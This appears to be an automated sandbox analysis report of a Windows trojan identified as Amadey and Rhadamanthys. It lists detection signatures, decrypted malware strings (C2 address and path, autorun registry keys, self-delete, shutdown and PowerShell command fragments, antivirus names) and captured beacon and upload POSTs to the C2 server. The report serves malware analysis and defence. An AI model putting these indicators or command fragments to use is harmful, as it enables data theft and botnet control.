Windows Analysis Report
J2NWKU2oJi.exe

Overview

General Information

Sample name: J2NWKU2oJi.exe
renamed because original name is a hash value
Original sample name: 9e64b65535e29ec152642d8bdcb22974.exe
Analysis ID: 1425696
MD5: 9e64b65535e29ec152642d8bdcb22974
SHA1: 5431aa7526ba193c0a92afffe2537bc54f51a0ba
SHA256: 6586cb8766c14a87330bf6c79a7cbd7cbff3ca9da63574a9c348645117d08f14
Tags: 32exetrojan
Infos:

Detection

Amadey, RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Avira: detection malicious, Label: HEUR/AGEN.1319380
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Avira: detection malicious, Label: HEUR/AGEN.1319380
Found malware configuration
Source: 22.2.Yuem.exe.ce0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "91.202.233.180/g88sks2SaM/index.php", "Version": "4.19"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Virustotal: Detection: 52% Perma Link
Multi AV Scanner detection for submitted file
Source: J2NWKU2oJi.exe Virustotal: Detection: 20% Perma Link
Source: J2NWKU2oJi.exe ReversingLabs: Detection: 21%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Joe Sandbox ML: detected
Machine Learning detection for sample
Source: J2NWKU2oJi.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 91.202.233.180
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: /g88sks2SaM/index.php
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: S-%lu-
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ccbfb9d50e
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Dctooux.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Startup
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: rundll32
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Programs
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: %USERPROFILE%
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: http://
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: https://
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: /Plugins/
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: &unit=
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: shell32.dll
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: kernel32.dll
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: GetNativeSystemInfo
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ProgramData\
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: AVAST Software
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Kaspersky Lab
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Panda Security
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Doctor Web
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 360TotalSecurity
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Bitdefender
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Norton
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Sophos
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Comodo
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: WinDefender
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 0123456789
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ------
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ?scr=1
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ComputerName
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: -unicode-
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: VideoID
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ProductName
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: CurrentBuild
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: rundll32.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: "taskkill /f /im "
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: " && timeout 1 && del
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: && Exit"
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: " && ren
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Powershell.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: shutdown -s -t 0
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: random
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 5sXe3T
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637FF7C CryptUnprotectData, 20_3_00007DF4B637FF7C
Uses 32bit PE files
Source: J2NWKU2oJi.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: J2NWKU2oJi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbTSw source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00406873 FindFirstFileW,FindClose, 0_2_00406873
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C49
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388E20 GetLogicalDriveStringsW, 20_3_00007DF4B6388E20
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 20_3_00007DF4B638BFA1
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 20_2_000001BD75700511

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49736
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49738
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49739
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49740 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49741 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49743 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49747 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49748 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49752 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49754 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49757 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49760 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49763 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49767 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49769 -> 91.202.233.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 91.202.233.180
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49736 -> 94.156.10.37:2036
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODkwNDc=Host: 91.202.233.180Content-Length: 89199Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTI0NDU=Host: 91.202.233.180Content-Length: 92597Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
